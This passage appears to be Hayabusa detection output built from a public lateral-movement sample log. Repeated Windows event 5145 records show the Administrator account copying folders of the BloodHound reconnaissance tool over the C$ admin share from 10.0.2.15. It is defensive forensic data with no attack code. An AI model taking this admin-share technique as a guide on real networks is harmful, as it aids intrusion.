Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.279 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.279 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.279 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.289 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.289 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.289 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.289 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.289 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.299 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.299 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.299 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.299 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.309 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.309 +00:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.309 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.309 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.319 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.319 +00:00,PC01.example.corp,5145,info,Collect,Network Share 
File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.319 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.319 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.319 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.329 +00:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.329 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.329 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.329 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.339 
+00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.339 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.339 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.339 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.339 
+00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.349 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.349 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.349 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.349 
+00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.359 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.359 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.359 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.369 +00:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.369 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.369 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.379 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.379 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.379 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.389 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.389 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.389 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.399 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.399 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.399 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.409 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.409 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.409 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.409 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.419 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.419 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.419 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist | IP Addr: 10.0.2.15 | LID: 